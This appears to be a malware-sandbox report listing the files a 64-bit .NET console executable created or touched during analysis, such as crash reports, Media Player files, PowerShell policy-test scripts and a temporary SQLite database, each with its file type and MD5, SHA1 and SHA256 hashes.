Filetype:	Win64 Executable Console Net Framework (206006/5) 48.58%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_14K3HQLSMFEQUGXV_b459fda994f63613fd3f413413133f89faf9749f_6c848b9a_66d5c219-ea77-4678-8787-4be4333f52c9\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	25B7E8108DF85A232EE6699B6BF82F47	8747021689F9B2A3F30FE59AD8085E5DD5302B69	B5A09BD5697FE8982A4EDD72C966D41D6E0A90708650FB8404919855B440C92C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BF4.tmp.dmp	Mini DuMP crash report, 16 streams, Wed Jul 3 16:51:58 2024, 0x1205a4 type	94F51452597557CEEF662DB2D9524015	9FF163DC095BCC931A8A6E850512C6AA5894170B	C44BAB398E9E476123CCA17613A43BD6879E4D518DBEE1D2D3DD40E91DF37CC5
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E18.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	D1BA841238813AACA11ED81A841DCFD4	0280AC5CBF2891995460936EC269229D5BD464E1	08C9A30B63A1707BDA545B5DB5450B9894093C11227977D68BFD5E4E900014DA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E48.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	EFCC32B026CD88A0FE3468FD09811567	48C96AF090CADE9F46E2CAFF9F4F5BEDFDDFF392	D6C462FBB603F7FD91567ABB2C3673FBE86EB59D9E12FB983ACA3BB8F931DD98
C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb	data	2A1AE33A07F40B43BA4A202587851FDB	D34E7BAC1371DD7ECF928B97CD41EBB65D1019F6	BA07C011B9242AB128E7F1CC828218FEA6591394005A3477C62B163DFE279BA5
C:\Users\user\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb	data	82B8F394027C6481D987F37E0EDC32AD	9E0D57DD09F4EF65271F04293A24BBC16E6BA75B	572BF92B4969FACDA732DEE96ACCB8F619B2C6F3E303D909CD269D127B895867
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\01_Music_auto_rated_at_5_stars.wpl	HTML document, ASCII text, with CRLF line terminators	159E63275630EC4C9747B664BD063938	BE4E32D7D022C3E3277E1ED65A21BEBCF787CE3F	D54745665432625A904636E7675612C85026DA07E68F4E9D8DACBE98E5DEE844
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\02_Music_added_in_the_last_month.wpl	HTML document, ASCII text, with CRLF line terminators	907BFC98CE854AE312127C952D8BE0F2	02DEFE8C5F9CC85742E45BA55E4FCFE326FD960C	C475DC7423C2AD60F25ADAAC754CD8B68B57FF04F26ECEF78F3E5961B986A324
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\03_Music_rated_at_4_or_5_stars.wpl	HTML document, ASCII text, with CRLF line terminators	6D791B697AF46D6777182AF7F18C2955	D73E8B5F4EE646C1C4AB6D23F3CB3394CB833CA8	4825EB90140F6B2F4F7ED0DF66B24E10FF5D0DA70AF53EA495FD30B3AA791870
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\04_Music_played_in_the_last_month.wpl	HTML document, ASCII text, with CRLF line terminators	F8D3A4CACF055F5EC5C62218EA50D290	974474CE3FE345D8015863BD6EA7242BA118532B	201F2170812CF8041964C4D3C5EF539D96ADEBA6A68B69ECAED0AFFE3AE8E25F
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\05_Pictures_taken_in_the_last_month.wpl	HTML document, ASCII text, with CRLF line terminators	821D2BE672F05514127C117CEF460C6E	1C75F314E7658A3DCDCAD315E301F2BAE6D47B31	3ABDB6CBD88AD1557054ECE3F10DD1A8494ED32F423B3CF8321B18DECC489474
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\06_Pictures_rated_4_or_5_stars.wpl	HTML document, ASCII text, with CRLF line terminators	0A8A40CA87323DC16893194B00C7FE77	B88A42A85053E0A7483E331B66BA5A40A6290E10	9AA433BED2E090CC6904F1C24D5A7B5A1ED6D8F71A997E661B886C69383FD53E
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\07_TV_recorded_in_the_last_week.wpl	HTML document, ASCII text, with CRLF line terminators	B9987B1F9DF6D0AFC01558B907E62A16	EF202D5D6F90B37C71CB757F3BABB0857CE54D86	0892EFDB8459D81D4C5E1085239734D9910B9C6A1DEBD7189CF385141F0B19D1
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\08_Video_rated_at_4_or_5_stars.wpl	HTML document, ASCII text, with CRLF line terminators	A3787A42B81FCE0E448976AD158EDD93	45FF275C0C32EAB1F0B56E8B61E8EAD18CFD1675	94BC17AC59BDE92FBCA00FCC69AED68FCBFE2C1754DD45F4810765F5FDF774FF
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\09_Music_played_the_most.wpl	HTML document, ASCII text, with CRLF line terminators	467E71AA2FD951EB0A1AF3D6BB8378E8	FB654C0B2663D4FA5FD0F1658097D936DD0429ED	A54BC2CAD63CED4FD9FF2A3A094A26E264E8A5CE8139193896D13236F494E2EE
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\10_All_Music.wpl	HTML document, ASCII text, with CRLF line terminators	51AEED11707741118E0706C1259DF22E	6434E915B018C6D15898FE0A4D006BBE3E1EDB60	EC286113E5AD77AC34063589A137A6DC4B4CAB8845CD9C5386519983FA3B48F0
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\11_All_Pictures.wpl	HTML document, ASCII text, with CRLF line terminators	74294EF495559ED32731F19096D70312	FDC6CC849270016D2A382D7D0DAABF44A4556CD9	DB34D82F2CD23E6E55A64E12D2A0A9C27AC2DED156483238F22A336CA6825110
C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\12_All_Video.wpl	HTML document, ASCII text, with CRLF line terminators	372D0BEEBEA5460409A6A1C53AC52A18	1B5A925E00F9A4CC3A18FEB8F74A2E39EF11EEB6	5B8B62B35E5DD8A46CCCCAF3FC3743BE9E0965D24CBCD20DA2681065EEB37EF3
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD	XML 1.0 document, ASCII text, with CRLF line terminators	90BE2701C8112BEBC6BD58A7DE19846E	A95BE407036982392E2E684FB9FF6602ECAD6F1E	644FBCDC20086E16D57F31C5BAD98BE68D02B1C061938D2F5F91CBE88C871FBF
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	7050D5AE8ACFBE560FA11073FEF8185D	5BC38E77FF06785FE0AEC5A345C4CCD15752560E	CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	7050D5AE8ACFBE560FA11073FEF8185D	5BC38E77FF06785FE0AEC5A345C4CCD15752560E	CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNSD.XML	ASCII text, with CRLF line terminators	A9B5DA9AEC61657B32393D96217165F0	80B5C577155ACD269B450D70F6B2CBED693EDF49	9F4611369CF65B33D886489B2486FCA7B1E83E0DC998D35B15B3AA4C8478A28D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	7B390667B7AD392C3A7ECD95310E0D68	F7ED92E360DACA5B2BB3152AFB8A26DD5A408706	E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az4vgb33.mej.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejalo0vz.3ve.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hechhxji.0w3.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqrdxq0w.wkj.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\c23yo28O4	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\Users\user\AppData\Local\Temp\wmsetup.log	ASCII text, with CRLF line terminators	03050AD13AFAF3E0C64BEF47FAF9A5FA	7A519E489EE8C735784E1BA77F15AF6578D6B9DB	16AD883E5ACAEC348F9CD7E435920E85A4DBE0832357E185C73F8DFD15004A8B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms (copy)	Matlab v4 mat-file (little endian) \253\373\277\272\002, sparse, rows 2, columns 0, imaginary	625B3C470881CEE9F5AA662AC6B67DF1	FA9ECB2122AE5C9D56B6A296DFDC06E36BCCBD2E	C27FDCE8D8E37374798CF1CB16C1FB740F97E0DFE9D53173C6F65242E5256F23
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TODI86YM2ECAGF8F0K0X.temp	Matlab v4 mat-file (little endian) \253\373\277\272\002, sparse, rows 2, columns 0, imaginary	625B3C470881CEE9F5AA662AC6B67DF1	FA9ECB2122AE5C9D56B6A296DFDC06E36BCCBD2E	C27FDCE8D8E37374798CF1CB16C1FB740F97E0DFE9D53173C6F65242E5256F23
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	A745BBECD0B770822EC76CDA982B72B2	3451ED80B0B596321888087262D7836D4088F05F	1E4AFF0C37524676CF5ACC87A0B1A5C0F6548C24D3268EA1543E17F82D7E4DCC